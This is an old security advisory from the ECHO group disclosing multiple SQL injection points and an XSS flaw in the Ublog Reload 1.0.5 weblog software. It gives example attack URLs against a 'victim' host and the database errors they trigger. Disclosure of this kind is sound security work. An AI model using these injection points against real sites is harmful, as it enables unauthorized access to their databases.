____________________ ___ ___ ________ \_ _____/\_ ___ \ / | \\_____ \ | __)_ / \ \// ~ \/ | \ | \\ \___\ Y / | \ /_______ / \______ /\___|_ /\_______ / \/ \/ \/ \/ .OR.ID ECHO_ADV_18$2005 --------------------------------------------------------------------------- [ECHO_ADV_18$2005] Multiple SQL INJECTION in Ublog Reload 1.0.5 --------------------------------------------------------------------------- Author: Dedi Dwianto Date: June, 20th 2005 Location: Indonesia, Jakarta Web: http://echo.or.id/adv/adv18-theday-2005.txt --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Ublog Reload version : 1.0.5 url : http://www.uapplication.com/ Author: uapplication Description: Ublog Reload is a complete weblog system write base asp.I Found Multiple Sql Injection Attack in this application. --------------------------------------------------------------------------- Vulnerabilitie: ~~~~~~~~~~~~~~~~ A. SQL Injection * http://victim/UblogReload/index.asp?ci=[SQL INJECT][id]&s=category ex : http://victim/UblogReload/index.asp?ci='62&s=category Error : Microsoft VBScript runtime error '800a000d' Type mismatch: 'cint' /UblogReload/index.asp, line 41 * http://victim/UblogReload/index.asp?d=[id][SQL Inject]&m=[mouth]&y=[year]&s=day ex : http://victim/UblogReload/index.asp?d=11'&m=6&y=2005&s=day Error : Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'Day(data) = 11' AND Month(data) = 6 AND Year(data) = 2005 ORDER BY data DESC;'. /UblogReload/index.asp, line 101 * http://victim/UblogReload/blog_comment.asp?bi=71&m=6&y=[year][SQL Inject]&d=&s=category Ex : http://victim/UblogReload/blog_comment.asp?bi=71&m=6&y=2005'&d=&s=category Error : Microsoft VBScript runtime error '800a000d' Type mismatch: 'iThisYear' /UblogReload/include/calendar.asp, line 7 * http://victim/UblogReload/index.asp?m=[mount][SQL Inject]&y=[year]&s=month Ex : http://victim/UblogReload/index.asp?m=6'&y=2005&s=month Error : Microsoft VBScript runtime error '800a000d' Type mismatch: 'cint' /UblogReload/include/functions_format_datetime.asp, line 26 * http://victim/UblogReload/index.asp?ui=[user ID][SQL Inject]&s=bloggers And XSS POC : http://victim/UblogReload/trackback.asp?bi=[id]&btitle=[XSS]&mode=view http://victim/UblogReload/trackback.asp?bi=343&btitle=&mode=view B. Fix Sorry I can't give solution because i can't view source code becase that's commersial Software. Contact vendor No response. --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous ~ Lieur Euy , MSR ~ newbie_hacker@yahoogroups.com , ~ #e-c-h-o@DALNET --------------------------------------------------------------------------- Contact: ~~~~~~~~ the_day || echo|staff || the_day[at]echo[dot]or[dot]id Homepage: http://theday.echo.or.id/ -------------------------------- [ EOF ] ----------------------------------